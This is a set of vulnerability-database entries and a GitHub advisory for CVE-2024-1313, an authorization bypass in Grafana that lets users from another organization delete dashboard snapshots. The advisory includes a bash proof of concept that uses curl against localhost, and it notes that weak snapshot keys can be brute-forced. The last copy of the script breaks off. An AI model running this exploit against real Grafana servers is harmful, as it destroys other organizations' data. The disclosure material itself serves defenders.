"\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u0435\u0431-\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 Grafana, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u043e\u0431\u0445\u043e\u0434\u043e\u043c \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u043e\u0431\u043e\u0439\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u0438 \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u043c\u043e\u043c\u0435\u043d\u0442\u0430\u043b\u044c\u043d\u044b\u0439 \u0441\u043d\u0438\u043c\u043e\u043a",
"\u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430": "\u0414\u0430\u043d\u043d\u044b\u0435 \u0443\u0442\u043e\u0447\u043d\u044f\u044e\u0442\u0441\u044f",
"\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "\u041e\u0431\u0445\u043e\u0434 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043a\u043b\u044e\u0447\u0430, \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c (CWE-639)",
"\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u0435\u0431-\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 Grafana \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043e\u0431\u0445\u043e\u0434\u043e\u043c \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e, \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c\u0443 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e, \u043e\u0431\u043e\u0439\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u0438 \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u043c\u043e\u043c\u0435\u043d\u0442\u0430\u043b\u044c\u043d\u044b\u0439 \u0441\u043d\u0438\u043c\u043e\u043a, \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0432 \u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u0435 \u0432 /api/snapshots/",
"\u041f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": null,
"\u041f\u0440\u043e\u0447\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f": null,
"\u0421\u0432\u044f\u0437\u044c \u0441 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430\u043c\u0438 \u0418\u0411": "\u0414\u0430\u043d\u043d\u044b\u0435 \u0443\u0442\u043e\u0447\u043d\u044f\u044e\u0442\u0441\u044f",
"\u0421\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430",
"\u0421\u043f\u043e\u0441\u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f": "\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
"\u0421\u043f\u043e\u0441\u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438": "\u041d\u0430\u0440\u0443\u0448\u0435\u043d\u0438\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438",
"\u0421\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438": "https://grafana.com/security/security-advisories/cve-2024-1313/\nhttps://redos.red-soft.ru/support/secure/",
"\u0421\u0442\u0430\u0442\u0443\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u043c",
"\u0422\u0438\u043f \u041f\u041e": "\u041e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430, \u041f\u0440\u0438\u043a\u043b\u0430\u0434\u043d\u043e\u0435 \u041f\u041e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c",
"\u0422\u0438\u043f \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "CWE-639",
"\u0423\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0421\u0440\u0435\u0434\u043d\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 2.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 6,8)\n\u0421\u0440\u0435\u0434\u043d\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 3.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 6,5)"
}
bit-grafana-2024-1313
Vulnerability from bitnami_vulndb
Published
2024-03-28 07:19
Modified
2025-05-20 10:02
Summary
Users outside an organization can delete a snapshot with its key
Details
It is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a DELETE request to /api/snapshots/ using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.
Grafana Labs would like to thank Ravid Mazon and Jay Chen of Palo Alto Research for discovering and disclosing this vulnerability.
This issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5.
{
"affected": [
{
"package": {
"ecosystem": "Bitnami",
"name": "grafana",
"purl": "pkg:bitnami/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "9.5.0"
},
{
"fixed": "9.5.18"
},
{
"introduced": "10.0.0"
},
{
"fixed": "10.0.13"
},
{
"introduced": "10.1.0"
},
{
"fixed": "10.1.9"
},
{
"introduced": "10.2.0"
},
{
"fixed": "10.2.6"
},
{
"introduced": "10.3.0"
},
{
"fixed": "10.3.5"
}
],
"type": "SEMVER"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
],
"aliases": [
"CVE-2024-1313"
],
"database_specific": {
"cpes": [
"cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"cpe:2.3:a:grafana:grafana:*:*:*:*:*:go:*:*"
],
"severity": "Medium"
},
"details": "It is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a DELETE request to /api/snapshots/\u003ckey\u003e using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.\n\nGrafana Labs would like to thank Ravid Mazon and Jay Chen of Palo \nAlto Research for discovering and disclosing this vulnerability.\n\nThis issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5.",
"id": "BIT-grafana-2024-1313",
"modified": "2025-05-20T10:02:07.006Z",
"published": "2024-03-28T07:19:10.064Z",
"references": [
{
"type": "WEB",
"url": "https://grafana.com/security/security-advisories/cve-2024-1313/"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20240524-0008/"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1313"
}
],
"schema_version": "1.5.0",
"summary": "Users outside an organization can delete a snapshot with its key"
}
FKIE_CVE-2024-1313
Vulnerability from fkie_nvd - Published: 2024-03-26 18:15 - Updated: 2026-04-15 00:35
Severity ?
Summary
It is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a DELETE request to /api/snapshots/<key> using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.
Grafana Labs would like to thank Ravid Mazon and Jay Chen of Palo
Alto Research for discovering and disclosing this vulnerability.
This issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5.
References
| URL | Tags | ||
|---|---|---|---|
| security@grafana.com | https://grafana.com/security/security-advisories/cve-2024-1313/ | ||
| security@grafana.com | https://security.netapp.com/advisory/ntap-20240524-0008/ | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://grafana.com/security/security-advisories/cve-2024-1313/ | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://security.netapp.com/advisory/ntap-20240524-0008/ |
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "It is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a DELETE request to /api/snapshots/\u003ckey\u003e using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.\n\nGrafana Labs would like to thank Ravid Mazon and Jay Chen of Palo \nAlto Research for discovering and disclosing this vulnerability.\n\nThis issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5."
},
{
"lang": "es",
"value": "Es posible que un usuario de una organizaci\u00f3n diferente al propietario de una instant\u00e1nea omita la autorizaci\u00f3n y elimine una instant\u00e1nea emitiendo una solicitud DELETE a /api/snapshots/ usando su clave de vista. Esta funcionalidad est\u00e1 destinada a estar disponible solo para personas con permiso para escribir/editar la instant\u00e1nea en cuesti\u00f3n, pero debido a un error en la l\u00f3gica de autorizaci\u00f3n, las solicitudes de eliminaci\u00f3n emitidas por un usuario sin privilegios en una organizaci\u00f3n diferente a la del propietario de la instant\u00e1nea se tratan. seg\u00fan lo autorizado. Grafana Labs desea agradecer a Ravid Mazon y Jay Chen de Palo Alto Research por descubrir y revelar esta vulnerabilidad. Este problema afecta a Grafana: desde 9.5.0 antes de 9.5.18, desde 10.0.0 antes de 10.0.13, desde 10.1.0 antes de 10.1.9, desde 10.2.0 antes de 10.2.6, desde 10.3.0 antes de 10.3.5."
}
],
"id": "CVE-2024-1313",
"lastModified": "2026-04-15T00:35:42.020",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "security@grafana.com",
"type": "Secondary"
}
]
},
"published": "2024-03-26T18:15:09.350",
"references": [
{
"source": "security@grafana.com",
"url": "https://grafana.com/security/security-advisories/cve-2024-1313/"
},
{
"source": "security@grafana.com",
"url": "https://security.netapp.com/advisory/ntap-20240524-0008/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://grafana.com/security/security-advisories/cve-2024-1313/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://security.netapp.com/advisory/ntap-20240524-0008/"
}
],
"sourceIdentifier": "security@grafana.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-639"
}
],
"source": "security@grafana.com",
"type": "Secondary"
}
]
}
GHSA-67RV-QPW2-6QRR
Vulnerability from github – Published: 2024-04-05 19:29 – Updated: 2024-11-18 16:26
VLAI?
Summary
Grafana: Users outside an organization can delete a snapshot with its key
Details
Summary
The DELETE /api/snapshots/{key} endpoint allows any Grafana user to delete snapshots if the user is NOT in the organization of the snapshot
Details
An attacker (a user without organization affiliation or with a "no basic role" in an organization other than the one where the dashboard exists), knowing the key or URL of a snapshot created by any user (including Grafana admins), can delete a snapshot (It is not feasible using UI), resulting in a BOLA vulnerability. If an attacker is in the same organization of the dashboard snapshot, he can’t delete the snapshot. However, an attacker with low-privilege from a different organization would be able to delete it, resulting in the authorization flaw.
Precondition
To exploit this endpoint, an attacker must know the {key} of a snapshot. The attacker can potentially discover this key in various ways.
When creating a snapshot through the API, users can manually specify a key without any complexity requirements. This lack of complexity makes this key susceptible to brute force attacks. For example, simplistic keys such as "customer_key_123" or "admin_snap" can be easily guessed. These predictable keys allow low-privileged attackers to perform brute-force attacks using common keywords, potentially leading to compromised data integrity.
In addition, this key is displayed in plain text in the URL of a snapshot. This means that if a user publicly displays a snapshot, viewers might note down the key. Furthermore, since the snapshot feature is often used for sharing, displaying, and backing up data, a low-privileged attacker could potentially find snapshot keys in places like the organization's content management system, messaging platform, or shared documents.
PoC
#!/bin/bash -x
# /snapshots/{key}: {'delete': {'success_status_code': 200, 'exec_paths': ['post /snapshots']}}
# 2d92c726-bf3c-4f20-b979-37bdf81d68c7
# Authentication stage
# User A - Grafana Admin
user_a_token="YWRtaW46YWRtaW4xMjM="
# User B - User with no permissions , which is not part of any org
user_b_token="YmJiOmJiYmJiYmJiYg=="
# Create snapshot
current_date=$(date +%Y-%m-%d-%H-%M-%S)
random_string="random-${current_date}"
snapshot_data='{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","snapshotData":[],"type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"fiscalYearStartMonth":0,"graphTooltip":0,"id":1517,"links":[],"liveNow":false,"panels":[{"aliasColors":{},"bars":false,"dashLength":10,"dashes":false,"datasource":null,"fill":1,"fillGradient":0,"gridPos":{"h":7,"w":24,"x":0,"y":0},"hiddenSeries":false,"id":4,"legend":{"alignAsTable":true,"avg":false,"current":true,"max":false,"min":false,"rightSide":true,"show":true,"total":false,"values":true},"lines":true,"linewidth":1,"links":[],"nullPointMode":"null","options":{"alertThreshold":true},"percentage":false,"pluginVersion":"10.2.3","pointradius":2,"points":false,"renderer":"flot","seriesOverrides":[],"snapshotData":[{"fields":[{"config":{},"name":"time","type":"time","values":[1704380420234,1704380420334,1704380420434,1704380420534,1704380420634,1704380420734,1704380420834,1704380566535,1704380566635,1704380566735,1704380566835,1704380566935,1704380567035,1704380567135,1704380567235,1704380567335,1704380567435,1704380567535,1704380567635,1704380567735,1704380567835,1704380567935,1704380568035,1704380568135,1704380568235,1704380568335,1704380568435,1704380568535,1704380568635,1704380568735,1704380568835,1704380568935,1704380569035,1704380569135,1704380569235,1704380569335,1704380569435,1704380569535,1704380569635,1704380569735,1704380569835,1704380569935,1704380570035,1704380570135,1704380570235,1704380570335,1704380570435,1704380570535,1704380570635,1704380570735,1704380570835,1704380570935,1704380571035,1704380571135,1704380571235,1704380571335,1704380571435,1704380571535,1704380571635,1704380571735,1704380571835,1704380571935,1704380572035,1704380572135,1704380572235,1704380572335,1704380572435,1704380572535,1704380572635,1704380572735,1704380572835,1704380572935,1704380573035,1704380573135,1704380573235,1704380573335,1704380573435,1704380573535,1704380573635,1704380573735,1704380573835,1704380573935,1704380574035,1704380574135,1704380574235,1704380574335,1704380574435,1704380574535,1704380574635,1704380574735,1704380574835,1704380574935,1704380575035,1704380575135,1704380575235,1704380575335,1704380575435,1704380575535,1704380575635,1704380575735,1704380575835,1704380575935,1704380576035,1704380576135,1704380576235,1704380576335,1704380576435,1704380576535,1704380576635,1704380576735,1704380576835,1704380576935,1704380577035,1704380577135,1704380577235,1704380577335,1704380577435,1704380577535,1704380577635,1704380577735,1704380577835,1704380577935,1704380578035,1704380578135,1704380578235,1704380578335,1704380578435,1704380578535,98.36651881887735,90.90520552302428,100.73967111022498,109.89826524946163,102.00960918579666,106.33530882778683,106.52629457166695,109.56323497328492,116.87832749309237,115.14116509660076,115.70457190523986,118.1091621354617,113.9144753018141,117.58351263310455,117.38409043570634,126.94212224196508,134.50552909930198,127.97490160986311,123.5784401639683,125.31012734609902,118.56171579412602,122.71596068271737,116.11258334902308,118.07532920254557,113.5755959893507,117.02863610131872,122.42991477107806,124.68121765645371,121.45599945829102,120.93643213038477,118.75961398984585,118.70214867496358,116.1085878323934,109.08837112411643,111.90652582288098,109.69360084697551,113.57752983270163,121.0455900847171,116.98257636596624,118.33231004235124,128.19430473604484,119.7539320116394,120.39948913692677,117.05787774775756,109.29564979026497,119.08806090022262,111.20930907183256,104.99629052804383,96.05550719780628,87.99845374253385,83.19203585736912,83.13916797842998,-70.53615047052016,-73.3850420187272]}],"meta":{},"refId":"A"}],"spaceLength":10,"stack":false,"steppedLine":false,"targets":[],"thresholds":[],"timeRegions":[],"title":"Simple dummy streaming example","tooltip":{"shared":true,"sort":0,"value_type":"individual"},"type":"graph","xaxis":{"mode":"time","show":true,"values":[]},"yaxes":[{"format":"short","logBase":1,"show":true},{"format":"short","logBase":1,"show":true}],"yaxis":{"align":false}}],"refresh":"","schemaVersion":39,"snapshot":{"timestamp":"2024-01-04T15:03:04.128Z"},"tags":[],"templating":{"list":[]},"time":{"from":"2024-01-04T15:02:08.132Z","to":"2024-01-04T15:03:08.132Z","raw":{"from":"now-1m","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Simple Streaming Example Snapshot","uid":"TXSTREZ","version":1,"weekStart":""},"name":"Simple Streaming Example Snapshot", "expires":0, "key":"admin_key"}'
create_snapshot_response=$(curl -s -X POST "http://localhost:3000/api/snapshots" -H "Authorization: Basic ${user_a_token}" -H "Content-Type: application/json" -d "${snapshot_data}")
# Extract key from create snapshot response
key=$(echo "$create_snapshot_response" | jq -r '.key')
# Delete snapshot
delete_snapshot_response=$(curl -s -X DELETE "http://localhost:3000/api/snapshots/${key}" -H "Authorization: Basic ${user_b_token}" -o /dev/null -w "%{http_code}")
# Check if the test passed
if [ "$delete_snapshot_response" -eq 200 ]; then
echo -e "\033[32mTest was passed, BOLA\033[0m"
fi
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "9.5.0"
},
{
"fixed": "9.5.18"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "10.0.0"
},
{
"fixed": "10.0.13"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "10.1.0"
},
{
"fixed": "10.1.9"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "10.2.0"
},
{
"fixed": "10.2.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "10.3.0"
},
{
"fixed": "10.3.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-1313"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": true,
"github_reviewed_at": "2024-04-05T19:29:10Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nThe ***DELETE /api/snapshots/{key}*** endpoint allows any Grafana user to delete snapshots if the user is NOT in the organization of the snapshot\n\n\n### Details\nAn attacker (a user without organization affiliation or with a \"no basic role\" in an organization other than the one where the dashboard exists), knowing the key or URL of a snapshot created by any user (including Grafana admins), can delete a snapshot (It is not feasible using UI), resulting in a BOLA vulnerability. \nIf an attacker is in the same organization of the dashboard snapshot, he can\u2019t delete the snapshot. However, an attacker with low-privilege from a different organization would be able to delete it, resulting in the authorization flaw. \n\n\n\n### Precondition\nTo exploit this endpoint, an attacker must know the {key} of a snapshot. The attacker can potentially discover this key in various ways.\n\nWhen [creating a snapshot through the API](https://grafana.com/docs/grafana/latest/developers/http_api/snapshot/), users can manually specify a key without any complexity requirements. This lack of complexity makes this key susceptible to brute force attacks. For example, simplistic keys such as \"customer_key_123\" or \"admin_snap\" can be easily guessed. These predictable keys allow low-privileged attackers to perform brute-force attacks using common keywords, potentially leading to compromised data integrity.\n\nIn addition, this key is displayed in plain text in the URL of a snapshot. This means that if a user publicly displays a snapshot, viewers might note down the key. Furthermore, since the snapshot feature is often used for sharing, displaying, and backing up data, a low-privileged attacker could potentially find snapshot keys in places like the organization\u0027s content management system, messaging platform, or shared documents.\n\n### PoC\n```\n#!/bin/bash -x\n\n# /snapshots/{key}: {\u0027delete\u0027: {\u0027success_status_code\u0027: 200, \u0027exec_paths\u0027: [\u0027post /snapshots\u0027]}}\n# 2d92c726-bf3c-4f20-b979-37bdf81d68c7\n\n# Authentication stage\n\n# User A - Grafana Admin\nuser_a_token=\"YWRtaW46YWRtaW4xMjM=\"\n\n# User B - User with no permissions , which is not part of any org\nuser_b_token=\"YmJiOmJiYmJiYmJiYg==\"\n\n# Create snapshot\ncurrent_date=$(date +%Y-%m-%d-%H-%M-%S)\nrandom_string=\"random-${current_date}\"\nsnapshot_data=\u0027{\"dashboard\":{\"annotations\":{\"list\":[{\"name\":\"Annotations \u0026 Alerts\",\"enable\":true,\"iconColor\":\"rgba(0, 211, 255, 1)\",\"snapshotData\":[],\"type\":\"dashboard\",\"builtIn\":1,\"hide\":true}]},\"editable\":true,\"fiscalYearStartMonth\":0,\"graphTooltip\":0,\"id\":1517,\"links\":[],\"liveNow\":false,\"panels\":[{\"aliasColors\":{},\"bars\":false,\"dashLength\":10,\"dashes\":false,\"datasource\":null,\"fill\":1,\"fillGradient\":0,\"gridPos\":{\"h\":7,\"w\":24,\"x\":0,\"y\":0},\"hiddenSeries\":false,\"id\":4,\"legend\":{\"alignAsTable\":true,\"avg\":false,\"current\":true,\"max\":false,\"min\":false,\"rightSide\":true,\"show\":true,\"total\":false,\"values\":true},\"lines\":true,\"linewidth\":1,\"links\":[],\"nullPointMode\":\"null\",\"options\":{\"alertThreshold\":true},\"percentage\":false,\"pluginVersion\":\"10.2.3\",\"pointradius\":2,\"points\":false,\"renderer\":\"flot\",\"seriesOverrides\":[],\"snapshotData\":[{\"fields\":[{\"config\":{},\"name\":\"time\",\"type\":\"time\",\"values\":[1704380420234,1704380420334,1704380420434,1704380420534,1704380420634,1704380420734,1704380420834,1704380566535,1704380566635,1704380566735,1704380566835,1704380566935,1704380567035,1704380567135,1704380567235,1704380567335,1704380567435,1704380567535,1704380567635,1704380567735,1704380567835,1704380567935,1704380568035,1704380568135,1704380568235,1704380568335,1704380568435,1704380568535,1704380568635,1704380568735,1704380568835,1704380568935,1704380569035,1704380569135,1704380569235,1704380569335,1704380569435,1704380569535,1704380569635,1704380569735,1704380569835,1704380569935,1704380570035,1704380570135,1704380570235,1704380570335,1704380570435,1704380570535,1704380570635,1704380570735,1704380570835,1704380570935,1704380571035,1704380571135,1704380571235,1704380571335,1704380571435,1704380571535,1704380571635,1704380571735,1704380571835,1704380571935,1704380572035,1704380572135,1704380572235,1704380572335,1704380572435,1704380572535,1704380572635,1704380572735,1704380572835,1704380572935,1704380573035,1704380573135,1704380573235,1704380573335,1704380573435,1704380573535,1704380573635,1704380573735,1704380573835,1704380573935,1704380574035,1704380574135,1704380574235,1704380574335,1704380574435,1704380574535,1704380574635,1704380574735,1704380574835,1704380574935,1704380575035,1704380575135,1704380575235,1704380575335,1704380575435,1704380575535,1704380575635,1704380575735,1704380575835,1704380575935,1704380576035,1704380576135,1704380576235,1704380576335,1704380576435,1704380576535,1704380576635,1704380576735,1704380576835,1704380576935,1704380577035,1704380577135,1704380577235,1704380577335,1704380577435,1704380577535,1704380577635,1704380577735,1704380577835,1704380577935,1704380578035,1704380578135,1704380578235,1704380578335,1704380578435,1704380578535,98.36651881887735,90.90520552302428,100.73967111022498,109.89826524946163,102.00960918579666,106.33530882778683,106.52629457166695,109.56323497328492,116.87832749309237,115.14116509660076,115.70457190523986,118.1091621354617,113.9144753018141,117.58351263310455,117.38409043570634,126.94212224196508,134.50552909930198,127.97490160986311,123.5784401639683,125.31012734609902,118.56171579412602,122.71596068271737,116.11258334902308,118.07532920254557,113.5755959893507,117.02863610131872,122.42991477107806,124.68121765645371,121.45599945829102,120.93643213038477,118.75961398984585,118.70214867496358,116.1085878323934,109.08837112411643,111.90652582288098,109.69360084697551,113.57752983270163,121.0455900847171,116.98257636596624,118.33231004235124,128.19430473604484,119.7539320116394,120.39948913692677,117.05787774775756,109.29564979026497,119.08806090022262,111.20930907183256,104.99629052804383,96.05550719780628,87.99845374253385,83.19203585736912,83.13916797842998,-70.53615047052016,-73.3850420187272]}],\"meta\":{},\"refId\":\"A\"}],\"spaceLength\":10,\"stack\":false,\"steppedLine\":false,\"targets\":[],\"thresholds\":[],\"timeRegions\":[],\"title\":\"Simple dummy streaming example\",\"tooltip\":{\"shared\":true,\"sort\":0,\"value_type\":\"individual\"},\"type\":\"graph\",\"xaxis\":{\"mode\":\"time\",\"show\":true,\"values\":[]},\"yaxes\":[{\"format\":\"short\",\"logBase\":1,\"show\":true},{\"format\":\"short\",\"logBase\":1,\"show\":true}],\"yaxis\":{\"align\":false}}],\"refresh\":\"\",\"schemaVersion\":39,\"snapshot\":{\"timestamp\":\"2024-01-04T15:03:04.128Z\"},\"tags\":[],\"templating\":{\"list\":[]},\"time\":{\"from\":\"2024-01-04T15:02:08.132Z\",\"to\":\"2024-01-04T15:03:08.132Z\",\"raw\":{\"from\":\"now-1m\",\"to\":\"now\"}},\"timepicker\":{\"refresh_intervals\":[\"5s\",\"10s\",\"30s\",\"1m\",\"5m\",\"15m\",\"30m\",\"1h\",\"2h\",\"1d\"],\"time_options\":[\"5m\",\"15m\",\"1h\",\"6h\",\"12h\",\"24h\",\"2d\",\"7d\",\"30d\"]},\"timezone\":\"\",\"title\":\"Simple Streaming Example Snapshot\",\"uid\":\"TXSTREZ\",\"version\":1,\"weekStart\":\"\"},\"name\":\"Simple Streaming Example Snapshot\", \"expires\":0, \"key\":\"admin_key\"}\u0027\n\ncreate_snapshot_response=$(curl -s -X POST 